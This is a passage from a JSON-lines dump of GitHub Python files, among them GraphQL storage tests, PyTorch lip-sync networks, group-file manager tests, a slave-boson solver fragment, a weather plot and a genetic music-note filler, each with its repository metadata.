session(url: str, key: str = \"jlewallen\"):\n global session_key\n jwt_token = jwt.encode(dict(key=key), session_key, algorithm=\"HS256\")\n return Client(\n transport=AIOHTTPTransport(\n url=url, headers={\"Authorization\": \"Bearer %s\" % (jwt_token,)}\n ),\n fetch_schema_from_transport=True,\n )\n\n\nasync def initialize(url: str):\n async with session(url) as s:\n query = gql(\"mutation { makeSample { affected { key } } }\")\n await s.execute(query)\n\n\ndef app():\n global session_key\n log.info(\"starting test server\")\n cfg = config.symmetrical(\":memory:\", session_key=session_key)\n schema = schema_factory.create()\n domain = cfg.make_domain()\n get_logger(\"ariadne.silenced\").setLevel(logging.CRITICAL)\n return ariadne.asgi.GraphQL(\n schema,\n context_value=schema_factory.context(cfg, domain),\n debug=True,\n logger=\"ariadne.silenced\",\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef server():\n log.info(\"starting server\")\n proc = Process(\n target=uvicorn.run,\n args=(app,),\n kwargs={\n \"host\": \"127.0.0.1\",\n \"port\": 45600,\n \"log_level\": \"critical\",\n \"factory\": True,\n },\n daemon=True,\n )\n proc.start()\n time.sleep(0.5)\n\n asyncio.run(initialize(\"http://127.0.0.1:45600\"))\n # loop = asyncio.get_event_loop()\n # loop.run_until_complete()\n\n yield\n\n proc.kill()\n\n\ndef get_token(key: str, session_key=\"asdfasdf\"):\n return jwt.encode(dict(key=key), session_key, algorithm=\"HS256\")\n\n\n@pytest.mark.asyncio\nasync def test_storage_http_number_of_entities(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n size = await store.number_of_entities()\n assert size == 70\n\n\n@pytest.mark.asyncio\nasync def test_storage_load_by_key(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n serialized = await store.load_by_key(\"world\")\n assert [json.loads(s.serialized) for s in serialized]\n\n\n@pytest.mark.asyncio\nasync def test_storage_load_by_gid(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n serialized = await store.load_by_gid(0)\n assert [json.loads(s.serialized) for s in serialized]\n\n\n@pytest.mark.asyncio\nasync def test_storage_update_nothing(server, silence_aihttp):\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n serialized = await store.update({})\n assert serialized == {}\n\n\n@pytest.fixture(scope=\"session\")\ndef deterministic():\n with test.Deterministic():\n yield\n\n\n@pytest.mark.asyncio\n@freezegun.freeze_time(\"2019-09-25\")\nasync def test_storage_update_one_entity(\n snapshot, server, silence_aihttp, deterministic\n):\n key = shortuuid.uuid(name=\"example-1\")\n e = Entity(key=key, creator=World(), props=Common(name=\"Fake Entity\"))\n serialized = serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"before.json\")\n\n e.version.increase()\n serialized = serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"after.json\")\n\n loaded: List[Serialized] = await store.load_by_key(key)\n snapshot.assert_match(\n test.pretty_json({v.key: v.serialized for v in loaded}, deterministic=True),\n \"queried.json\",\n )\n\n\n@pytest.mark.asyncio\n@freezegun.freeze_time(\"2019-09-25\")\nasync def test_storage_delete_one_entity(\n snapshot, server, silence_aihttp, deterministic, caplog\n):\n key = shortuuid.uuid(name=\"example-2\")\n e = Entity(key=key, creator=World(), props=Common(name=\"Fake Entity\"))\n serialized = serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n store = storage.HttpStorage(\"http://127.0.0.1:45600\", get_token(\"jlewallen\"))\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"before.json\")\n\n e.version.increase()\n e.destroy()\n serialized = serializing.serialize(e, identities=serializing.Identities.PRIVATE)\n assert serialized\n\n updated = await store.update({key: CompiledJson.compile(serialized)})\n snapshot.assert_match(test.pretty_json(updated, deterministic=True), \"after.json\")\n\n with pytest.raises(Exception) as ex:\n with caplog.at_level(logging.CRITICAL):\n await store.load_by_key(key)\n\n assert \"MissingEntityException\" in str(ex)\n","repo_name":"jlewallen/dimsum","sub_path":"src/dimsum/test_storage_http.py","file_name":"test_storage_http.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"12578047831","text":"# https://www.interviewbit.com/courses/programming/topics/dynamic-programming/problems/unique-binary-search-trees-ii/\n# \n\nclass Solution:\n # @param A : integer\n # @return an integer\n def numTrees(self, A):\n return self._numTrees(A, {})\n\n def _numTrees(self, num, memo):\n if num <= 1: return 1\n if num in memo: return memo[num]\n \n total = 0\n for n in xrange(1, num+1):\n leftWays = self._numTrees(n - 1, memo)\n rightWays = self._numTrees(num - n, memo)\n total += leftWays * rightWays\n \n memo[num] = total \n return total\n","repo_name":"diegomontoyas/Algorithms","sub_path":"InterviewBit/unique-binary-search-trees-ii.py","file_name":"unique-binary-search-trees-ii.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1183194454","text":"# TODO: Seperate the networks into different files\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# from line_profiler_pycharm import profile\n\nACTIVATIONS = {\n 'relu': nn.ReLU,\n 'leaky_relu': nn.LeakyReLU,\n 'selu': nn.SELU,\n 'silu': nn.SiLU\n}\n\n\nclass WSLinear(nn.Module):\n def __init__(\n self, in_features, out_features\n ):\n super(WSLinear, self).__init__()\n self.linear = nn.Linear(in_features, out_features)\n self.scale = (2 / in_features) ** 0.5\n self.bias = self.linear.bias\n self.linear.bias = None\n\n nn.init.normal_(self.linear.weight)\n nn.init.zeros_(self.bias)\n\n # @profile\n def forward(self, x):\n return self.linear(x * self.scale) + self.bias\n\n\nclass AdaIN(nn.Module):\n\n def __init__(self, style_dim, n_feat):\n super(AdaIN, self).__init__()\n\n self.norm = nn.InstanceNorm2d(n_feat)\n self.mu = WSLinear(style_dim, n_feat)\n self.sigma = WSLinear(style_dim, n_feat)\n\n # @profile\n def forward(self, x, style):\n x = self.norm(x)\n mu = self.mu(style).unsqueeze(2).unsqueeze(3)\n sigma = self.sigma(style).unsqueeze(2).unsqueeze(3)\n\n #return (x * sigma) + mu\n return x\n\nclass BasicBlock(nn.Module):\n\n def __init__(self, in_c, out_c, h_c=None, activation='silu', use_norm=True):\n super(BasicBlock, self).__init__()\n if h_c is None:\n h_c = out_c\n\n self.conv1 = nn.Conv2d(in_c, h_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act1 = ACTIVATIONS[activation]()\n\n self.conv2 = nn.Conv2d(h_c, out_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act2 = ACTIVATIONS[activation]()\n\n if use_norm:\n self.norm1 = nn.InstanceNorm2d(h_c)\n self.norm2 = nn.InstanceNorm2d(out_c)\n else:\n self.norm1 = nn.Identity()\n self.norm2 = nn.Identity()\n\n # @profile\n def forward(self, x):\n\n x = self.conv1(x)\n x = self.act1(x)\n x = self.norm1(x)\n\n x = self.conv2(x)\n x = self.act2(x)\n x = self.norm2(x)\n\n return x\n\n\nclass ResBlock(nn.Module):\n\n def __init__(self, in_c, out_c, h_c=None, activation='silu', use_norm=True):\n super(ResBlock, self).__init__()\n if h_c is None:\n h_c = out_c\n\n self.conv1 = nn.Conv2d(in_c, h_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act1 = ACTIVATIONS[activation]()\n\n self.conv2 = nn.Conv2d(h_c, out_c, kernel_size=3, padding=1, bias=True, padding_mode='reflect')\n self.act2 = ACTIVATIONS[activation]()\n\n if use_norm:\n self.norm1 = nn.InstanceNorm2d(h_c)\n self.norm2 = nn.InstanceNorm2d(out_c)\n else:\n self.norm1 = nn.Identity()\n self.norm2 = nn.Identity()\n\n # @profile\n def forward(self, x):\n\n x0 = self.conv1(x)\n x0 = self.act1(x0)\n x0 = self.norm1(x0)\n\n x1 = self.conv2(x0)\n x1 = self.act2(x1)\n x1 = self.norm2(x1)\n\n return x + x1\n\n\nclass DownBlock(nn.Module):\n\n def __init__(self, in_c, out_c, downscale=2):\n super(DownBlock, self).__init__()\n\n self.down = nn.Conv2d(in_c, in_c, kernel_size=3, padding=1, padding_mode='reflect', stride=downscale)\n self.norm = nn.InstanceNorm2d(in_c)\n self.net = BasicBlock(in_c, out_c)\n\n # @profile\n def forward(self, x):\n x = self.down(x)\n x = self.norm(x)\n return self.net(x)\n\n\nclass UpBlock(nn.Module):\n\n def __init__(self, in_c, out_c, downscale=2, use_norm=True):\n super(UpBlock, self).__init__()\n\n self.net = BasicBlock(in_c * 2, out_c, use_norm=use_norm)\n self.up = nn.UpsamplingBilinear2d(scale_factor=downscale)\n\n # @profile\n def forward(self, x, x_skip):\n x = torch.cat((x_skip, x), dim=1)\n x = self.net(x)\n return self.up(x)\n\n\nclass UnetAdaIN(nn.Module):\n\n def __init__(self, in_c, out_c, n_blocks=4, downscale=2, init_features=32, cond_c=256):\n super(UnetAdaIN, self).__init__()\n\n self.in_conv = nn.Conv2d(in_c, init_features, kernel_size=7, padding=3, padding_mode='reflect')\n downs = []\n n_feat = init_features\n for block in range(n_blocks):\n downs.append(DownBlock(n_feat, n_feat * 2, downscale=downscale))\n n_feat *= 2\n self.downs = nn.ModuleList(downs)\n\n self.bottleneck = nn.ModuleList([ResBlock(n_feat, n_feat), ResBlock(n_feat, n_feat), ResBlock(n_feat, n_feat)])\n\n ups, adas = [], []\n n_cond = n_feat\n for block in range(n_blocks):\n ups.append(UpBlock(n_feat, n_feat // 2, downscale=downscale, use_norm=False))\n adas.append(AdaIN(n_cond, n_feat // 2))\n n_feat = n_feat // 2\n\n self.ups = nn.ModuleList(ups)\n self.adas = nn.ModuleList(adas)\n\n self.final_block = BasicBlock(n_feat, n_feat)\n self.out_conv = nn.Conv2d(n_feat, out_c, kernel_size=1, padding=0)\n\n self.mapping = nn.Sequential(\n nn.Linear(cond_c, cond_c),\n nn.LeakyReLU(),\n\n nn.Linear(cond_c, cond_c),\n nn.LeakyReLU(),\n\n nn.Linear(cond_c, cond_c),\n nn.LeakyReLU()\n )\n\n # @profile\n def forward(self, x, x_ref):\n\n # x_ref = self.mapping(x_ref)\n\n x0 = self.in_conv(x)\n x_conds = [x0]\n x = x0\n\n for down in self.downs:\n x = down(x)\n x_conds.append(x)\n\n # for i, layer in enumerate(self.bottleneck):\n # x = layer(x)\n\n for i, up in enumerate(self.ups):\n x_skip = x_conds.pop(-1)\n x = up(x, x_skip)\n x = self.adas[i](x, x_ref.squeeze())\n\n x = self.final_block(x)\n # return torch.sigmoid(self.out_conv(x))\n return self.out_conv(x)\n\n\nclass Conv2d(nn.Module):\n def __init__(self, cin, cout, kernel_size, stride, padding, residual=False, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.conv_block = nn.Sequential(\n nn.Conv2d(cin, cout, kernel_size, stride, padding),\n nn.BatchNorm2d(cout)\n )\n self.act = nn.ReLU()\n self.residual = residual\n\n def forward(self, x):\n out = self.conv_block(x)\n if self.residual:\n out += x\n return self.act(out)\n\nclass AudioEncoder(nn.Module):\n\n def __init__(self):\n super(AudioEncoder, self).__init__()\n self.net = nn.Sequential(\n Conv2d(1, 32, kernel_size=3, stride=1, padding=1),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(64, 128, kernel_size=3, stride=3, padding=1),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1),\n Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(256, 512, kernel_size=3, stride=1, padding=0),\n Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)\n\n # @profile\n def forward(self, x):\n for layer in self.net:\n x = layer(x)\n return x\n\n\nclass Discriminator(nn.Module):\n\n def __init__(self, in_c, init_h_c=64, n_layers=5, image_size=256):\n super(Discriminator, self).__init__()\n\n self.in_conv = nn.Conv2d(in_c, init_h_c, padding=1, kernel_size=3, padding_mode='reflect')\n self.image_size = image_size\n self.final_size = image_size // (2 ** n_layers)\n downs = []\n nf = init_h_c\n for layer in range(n_layers):\n downs.append(DownBlock(nf, nf))\n # nf *= 2\n self.downs = nn.ModuleList(downs)\n\n # TODO: Add attention layer\n\n self.out_conv = nn.Sequential(\n nn.Conv2d(nf, nf, kernel_size=3, padding=1, padding_mode='reflect'),\n nn.LeakyReLU(0.2, True),\n nn.InstanceNorm2d(nf),\n nn.Conv2d(nf, 1, kernel_size=1)\n )\n\n #self.out_fc = nn.Sequential(\n # nn.Linear(nf * self.final_size * self.final_size, 512),\n # nn.LeakyReLU(0.2, True),\n # nn.Linear(512, 1)\n #)\n\n\n # @profile\n def forward(self, x):\n x = self.in_conv(x)\n for down in self.downs:\n x = down(x)\n return self.out_conv(x)\n\n\nclass Audio2Parameter(nn.Module):\n\n def __init__(self, n_params, cond_c=None):\n super(Audio2Parameter, self).__init__()\n self.audio_enc = AudioEncoder()\n\n self.n_in = 512\n self.use_cond = False\n if cond_c is not None:\n self.n_in += cond_c\n self.use_cond = True\n\n self.MLP = nn.Sequential(\n nn.Linear(self.n_in, 512),\n nn.Linear(self.n_in, 512),\n nn.LeakyReLU(),\n\n nn.Linear(512, 256),\n nn.LeakyReLU(),\n\n nn.Linear(256, n_params)\n )\n\n # @profile\n def forward(self, audio, cond=None):\n # audio = (B, 80, 16), cond = None or (B, C)\n # out = (B, N)\n if self.use_cond and cond is None:\n raise ValueError('Condition is specified but not provided')\n\n x = self.audio_enc(audio).reshape((audio.shpae[0], 512))\n if cond is not None:\n x = torch.cat((x, cond), dim=-1)\n return self.MLP(x)\n\n\nclass TripleSyncnet(nn.Module):\n \"\"\"SyncNet with 3 inputs: audio, video, and parameters.\n \"\"\"\n\n def __init__(self, n_params, T=5):\n\n super(TripleSyncnet, self).__init__()\n self.audio_enc = AudioEncoder()\n\n self.param_enc = nn.Sequential(\n nn.Linear(n_params * T, 512),\n nn.LeakyReLU(),\n\n nn.Linear(512, 512),\n nn.LeakyReLU(),\n\n nn.Linear(512, 512),\n nn.LeakyReLU(),\n\n nn.Linear(512, 512)\n )\n\n self.video_enc = nn.Sequential(\n nn.Conv2d(3 * T, 64, kernel_size=3, stride=1, padding=1),\n nn.LeakyReLU(),\n\n DownBlock(64, 64), # (B, 64, 128, 128)\n DownBlock(64, 64), # (B, 128, 64, 64)\n DownBlock(64, 64), # (B, 256, 32, 32)\n DownBlock(64, 128), # (B, 256, 16, 16)\n DownBlock(128, 128), # (B, 256, 8, 8)\n DownBlock(128, 128), # (B, 256, 4, 4)\n DownBlock(128, 256), # (B, 256, 2, 2)\n DownBlock(256, 512), # (B, 512, 1, 1)\n )\n\n # @profile\n def forward(self, audio=None, params=None, video=None):\n # Audio = (B, 80, 16), params = (B, T, C), video = (B, 3, 256, 256)\n\n audio_enc = None\n if audio is not None:\n audio_enc = self.audio_enc(audio)\n audio_enc = F.normalize(audio_enc, dim=-1)\n\n param_enc = None\n if params is not None:\n param_enc = self.param_enc(params)\n param_enc = F.normalize(param_enc, dim=-1)\n\n video_enc = None\n if video is not None:\n video = video.reshape((video.shape[0], -1, video.shape[2], video.shape[3]))\n video = self.video_enc(video)\n video_enc = F.normalize(video, dim=-1)\n\n return audio_enc, param_enc, video_enc\n\n def _compute_loss(self, enc_a, enc_b, is_same):\n\n similariy = F.cosine_similarity(enc_a, enc_b, dim=-1)\n if is_same:\n target = torch.ones_like(similariy)\n else:\n target = torch.zeros_like(similariy)\n\n loss = F.binary_cross_entropy(similariy, target)\n return loss\n\n def compute_loss(self, audio_enc_a=None, param_enc_a=None, video_enc_a=None,\n audio_enc_b=None, param_enc_b=None, video_enc_b=None):\n\n loss = 0\n\n if audio_enc_a is not None:\n if audio_enc_b is not None:\n loss += self._compute_loss(audio_enc_a, audio_enc_b, is_same=False)\n if param_enc_b is not None:\n loss += self._compute_loss(audio_enc_a, param_enc_b, is_same=False)\n if video_enc_b is not None:\n loss += self._compute_loss(audio_enc_a, video_enc_b, is_same=False)\n if param_enc_a is not None:\n loss += self._compute_loss(audio_enc_a, param_enc_a, is_same=True)\n if video_enc_a is not None:\n loss += self._compute_loss(audio_enc_a, video_enc_a, is_same=True)\n\n if param_enc_a is not None:\n if audio_enc_b is not None:\n loss += self._compute_loss(param_enc_a, audio_enc_b, is_same=False)\n if param_enc_b is not None:\n loss += self._compute_loss(param_enc_a, param_enc_b, is_same=False)\n if video_enc_b is not None:\n loss += self._compute_loss(param_enc_a, video_enc_b, is_same=False)\n if video_enc_a is not None:\n loss += self._compute_loss(param_enc_a, video_enc_a, is_same=True)\n\n if video_enc_a is not None:\n if audio_enc_b is not None:\n loss += self._compute_loss(video_enc_a, audio_enc_b, is_same=False)\n if param_enc_b is not None:\n loss += self._compute_loss(video_enc_a, param_enc_b, is_same=False)\n if video_enc_b is not None:\n loss += self._compute_loss(video_enc_a, video_enc_b, is_same=False)\n\n if audio_enc_b is not None:\n if param_enc_b is not None:\n loss += self._compute_loss(audio_enc_b, param_enc_b, is_same=True)\n if video_enc_b is not None:\n loss += self._compute_loss(audio_enc_b, video_enc_b, is_same=True)\n\n if param_enc_b is not None:\n if video_enc_b is not None:\n loss += self._compute_loss(param_enc_b, video_enc_b, is_same=True)\n\n return loss\n","repo_name":"oijoijcoiejoijce/BigDub","sub_path":"networks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"32921767395","text":"#!/usr/bin/python3\n\nfrom os import unlink\nfrom os import mkdir\nfrom shutil import copyfile\nimport unittest\n\nimport groupman\n\n\nclass TestGroupManager(unittest.TestCase):\n def setUp(self):\n try:\n mkdir(\"build\", 0o755)\n except FileExistsError:\n pass\n try:\n unlink(\"build/group\")\n except FileNotFoundError:\n pass\n copyfile(\"data/group\", \"build/group\")\n\n def test_parse_groups(self):\n manager = groupman.parse_group_file(\"build/group\")\n self.assertEqual(5, len(manager.groups))\n self.assertEqual('admins', manager.group_by_name['admins'].name)\n self.assertEqual('test', manager.group_by_id['5000'].name)\n self.assertEqual(2, len(manager.group_by_name['admins'].users))\n\n def test_add(self):\n group = groupman.Group(\"groupname:x:1:init\")\n self.assertEqual(1, len(group.users))\n group.exec_line(\"+newval\")\n self.assertEqual(2, len(group.users))\n\n def test_remove(self):\n group = groupman.Group(\"groupname:x:1:init\")\n self.assertEqual(1, len(group.users))\n group.exec_line(\"-init\")\n self.assertEqual(0, len(group.users))\n\n def test_group_to_string(self):\n group = groupman.Group(\"groupname:x:1:init\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init\", str_val)\n\n def test_group_add_to_string(self):\n group = groupman.Group(\"groupname:x:1:init\")\n group.exec_line(\"+newval\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init,newval\", str_val)\n\n def test_group_remove_to_string(self):\n group = groupman.Group(\"groupname:x:1:init,newval\")\n group.exec_line(\"-newval\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init\", str_val)\n\n def test_group_add_duplicate_to_string(self):\n group = groupman.Group(\"groupname:x:1:init,newval\")\n group.exec_line(\"+newval\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init,newval\", str_val)\n\n def test_manager_to_string(self):\n group = groupman.Group(\"groupname:x:1:init\")\n manager = groupman.GroupMan([group])\n self.assertEqual(1, len(manager.groups))\n str_val = manager.to_string()\n self.assertEqual(\"groupname:x:1:init\\n\", str_val)\n\n def test_end_to_end(self):\n manager = groupman.parse_group_file(\"build/group\")\n before = manager.group_by_name[\"admins\"].to_string()\n self.assertEqual(\"admins:x:1000:anne,prithi\", before)\n manager.exec_files(\"data/group.d\")\n after = manager.group_by_name[\"admins\"].to_string()\n self.assertEqual(\"admins:x:1000:adam,anne\", after)\n\n def test_execute(self):\n group_file = \"build/group\"\n\n fd = open(group_file, \"rt\")\n before = fd.readlines()\n fd.close()\n \n manager = groupman.execute(group_file, \"data/group.d\")\n\n fd = open(group_file, \"rt\")\n after = fd.readlines()\n fd.close()\n num_lines = len(before)\n self.assertEqual(num_lines, len(after))\n for i in range(num_lines):\n before_line = before[i]\n after_line = after[i]\n if before_line.startswith(\"admins\"):\n assertEqual('admins:x:1000:anne,prithi\\n', before_line)\n assertEqual('admins:x:1000:adam,anne\\n', after_line)\n else:\n assertEqual(before_line, after_line)\n \n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"admiyo/groupman","sub_path":"groupman/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33470699483","text":"\"\"\"Provide constant values.\"\"\"\nCOLORS = {\n \"black\": (0x00, 0x00, 0x00),\n \"blue\": (0x00, 0x00, 0xFF),\n \"cyan\": (0x00, 0xFF, 0xFF),\n \"green\": (0x00, 0xFF, 0x00),\n \"pink\": (0x80, 0x00, 0x80), # purple not pink\n \"red\": (0xFF, 0x00, 0x00),\n \"white\": (0xFF, 0xFF, 0xFF),\n \"yellow\": (0xFF, 0xFF, 0x00),\n}\nCONFIG_FILE = \"config.json\"\n","repo_name":"jalmeroth/FelixTheCat","sub_path":"upython/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3978984175","text":"import numpy as np\nimport scipy as sp\nfrom scipy.linalg import pinv as inverse\nimport scipy.linalg\nfrom math import pi,sqrt\nimport matplotlib.pyplot as py\nfrom functools import partial\n\n#R comes with a 1/sqrt(2) (I think)?\n\ndef globalNewton(funcs,b,J,tol=10**-4,lmin=10**-1,halt=False):\n 'Globally convergent Newton algorithm'\n def X(x):\n 'Converts a matrix into a numpy array with boson labels'\n temp = np.array([0+0*1j],dtype=[(amp,'complex64') for amp in ('D','E','up','dn','Dstar','Estar','upstar','dnstar','l0','lup','ldn')])\n for i,bos in enumerate(['l0','lup','ldn','E','D','up','dn','Estar','Dstar','upstar','dnstar']):\n temp[bos] = x[i]\n return temp\n\n #1.) Compute Newton direction\n mixPrev = 1\n mix = 1\n g = lambda funcs,b: 0.5*sp.linalg.norm([f(b) for f in funcs])**2\n dg = lambda df,dx: (df*dx)[0,0]\n x = sp.matrix([complex(b[bos]) for bos in ('l0','lup','ldn','E','D','up','dn','Estar','Dstar','upstar','dnstar')])\n F = sp.matrix([f(b) for f in funcs]).transpose()\n xnew = -inverse(J)*F\n g1 = g(funcs,X(x.transpose()+xnew))\n g0 = g(funcs,b)\n #dF = sp.matrix([f(X(x.transpose()+xnew))-f(b) for f in funcs])\n dF = np.conj(F).transpose()*J #Do we need F conjugate?? Then we are minimizing conj(F) F which is presubably the proper measure\n itern = 0\n #print(g1 - g0 - tol*dg(dF,xnew))\n while g1 - g0 - tol*dg(dF,xnew)>0 and itern<10:\n #print(\"Iteration number {}\".format(itern))\n #print(\"g0 = {}\".format(g0))\n if itern == 0:\n mix = np.real(-0.5*dg(dF,xnew)/(g1-g0-dg(dF,xnew)))\n #print(\"Mixing parameter = {}\".format(mix))\n '''\n if mix<0.1:\n print(g1)\n gvals = [g(funcs,X(x.transpose()+l0*0.3*xnew/50)) for l0 in range(50)]\n py.plot([0.3*k/50 for k in range(50)],gvals,'o')\n py.hlines(g0,0,0.3)\n py.show()\n '''\n if mix1:\n mix = 0.1\n #raise Exception(\"Newton step divergent\")\n #print(\"Size of correction vector: {}\".format(sizeofCorr))\n if mix10**-8:\n #print(sizeofCorr)\n cnt = 'y'\n #py.plot(Rvals,'x')\n #py.show()\n #cnt = input(\"Continue?, y/n\")\n elif sizeofCorr<10**-8:\n cnt = 'n'\n #print(Rvals[-1])\n R_converged.append(sqrt(Rvals[-1]))\n print(R_converged[-1])\n #quit()\n #print(\"Particle density = {}\".format(dms[0][0,0]))\n '''\n b_new = -inverse(J)*g\n mixing = 10**-3\n #mixing = 1\n for i,v in enumerate(('l0','lup','ldn','E','D','up','dn','Estar','Dstar','upstar','dnstar')):\n new = b[v] + complex(b_new[i])\n b[v] = (1-mixing)*b[v] + mixing*new\n '''\nsp.savez('results_D={}_c={}_N={}'.format(bwidth,cstrength,N),Uvals=Uval,R=R_converged,delta=delta)\npy.plot([u/(pi*delta) for u in Uval],R_converged,'x')\npy.show()\n #results = np.vstack([results,b])\n #print(bosDens)","repo_name":"sean-harding/slaveBoson","sub_path":"slaveboson.py","file_name":"slaveboson.py","file_ext":"py","file_size_in_byte":12683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33891606471","text":"# Import Meteostat library and dependencies\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom meteostat import Point, Daily\n\n# Set time period\nstart = datetime(2014, 1, 1)\nend = datetime(2021, 12, 31)\n\n# Create Point for Wandersleben\nwandersleben = Point(50.897598, 10.853470, 70)\n\n# Get daily data from 2014 until 2021\ndata = Daily(wandersleben, start, end)\ndata = data.fetch()\n\n# Plot line chart including average, minimum and maximum temperature\ndata.plot(y=['tsun'])\nplt.show()\n\n\n\n\n","repo_name":"moritzmersch/Project_fantastic_five","sub_path":"fetch_weatherdata_WL.py","file_name":"fetch_weatherdata_WL.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"28586453026","text":"import random\nfrom sklearn.externals import joblib\nimport numpy as np\n\n\nclass Genetic:\n miss_start = -1\n miss_end = -1\n genome_length = 0\n notes_before = []\n notes_after = []\n mutation_rate = 0.1\n guesser = None\n total_best_score = 1000000\n best_population = []\n\n def __init__(self, song):\n for index, note in enumerate(song):\n if note == 0 and self.miss_start == -1:\n self.miss_start = index\n if note != 0 and self.miss_start != -1 and self.miss_end == -1:\n self.miss_end = index\n\n self.genome_length = self.miss_end - self.miss_start\n\n self.notes_before = song[self.miss_start - 20:self.miss_start]\n self.notes_after = song[self.miss_end:self.miss_end + 20]\n\n self.max = max(song)\n for index, note in enumerate(song):\n if note == 0:\n song[index] = self.max\n self.min = min(song)\n\n self.guesser = joblib.load(\"guesser\")\n\n def make_population(self, count):\n populations = []\n for i in range(count):\n temp_list = [random.randint(self.min, self.max) for iter in range(self.genome_length)]\n populations.append(temp_list)\n # print(\"generated {} populations with length of {}!\".format(count, self.genome_length))\n return populations\n\n def score_population(self, pop):\n pop = self.notes_before[-5:] + pop + self.notes_after[:5]\n total_score = 0\n reducers = []\n test_data = []\n for index, note in enumerate(pop[5:-5]):\n real_index = index + 5\n test_data_temp = pop[real_index - 5: real_index] + pop[real_index + 1:real_index + 5]\n # print(test_data_temp)\n reducer = test_data_temp[0]\n reducers.append(reducer)\n for ii, nn in enumerate(test_data_temp):\n test_data_temp[ii] = nn - reducer\n test_data.append(test_data_temp)\n\n test_results = self.guesser.predict(np.array(test_data))\n for ti, tv in enumerate(test_results):\n test_results[ti] = tv + reducers[ti]\n\n for index, note in enumerate(pop[5:-5]):\n guessed_note = test_results[index] # find out what was supposed to be here\n temp_score = abs(guessed_note - note)\n # print(temp_score)\n total_score += temp_score\n # print(total_score)\n return total_score\n\n def mutate_population(self, pop):\n rand_position = random.randint(0, self.genome_length - 1)\n random_note = random.randint(self.min, self.max)\n # print(\"mutating a population at position {} with the note {}!\".format(rand_position, random_note))\n pop[rand_position] = random_note\n # print(pop[rand_position])\n return pop\n\n def mix_genomes(self, g1, g2):\n pivot1 = random.randint(0, self.genome_length / 2)\n pivot2 = random.randint(pivot1 + (self.genome_length / 4), self.genome_length)\n\n rg1 = g1.copy() # return genome 1\n rg2 = g2.copy() # return genome 2\n\n rg1[pivot1:pivot2] = g2[pivot1: pivot2]\n rg2[pivot1:pivot2] = g1[pivot1: pivot2]\n\n # print(\"-----------\")\n # print(pivot1, pivot2)\n # print(g1)\n # print(rg1)\n # print(g2)\n # print(rg2)\n mutation_rand = random.uniform(0.00, 10.00)\n if mutation_rand <= (self.mutation_rate * 10):\n rg1 = self.mutate_population(rg1)\n # print(\"mutate rg1!\")\n mutation_rand = random.uniform(0.00, 10.00)\n if mutation_rand <= (self.mutation_rate * 10):\n rg2 = self.mutate_population(rg2)\n # print(\"mutate rg2!\")\n\n return rg1, rg2\n\n def run(self, iterations_count=5):\n populations_count = 100\n populations = self.make_population(populations_count)\n scores = [0] * populations_count\n\n i = 0\n while True:\n # score each population\n min_score = 10000\n for j, pop in enumerate(populations):\n scores[j] = self.score_population(populations[j])\n if scores[j] < self.total_best_score:\n self.total_best_score = scores[j]\n self.best_population = pop\n if scores[j] < min_score:\n min_score = scores[j]\n # print(\"best score was {}\".format(min_score))\n # sort populations by score. since the lower the score the better population is, first 30 are the best\n populations = 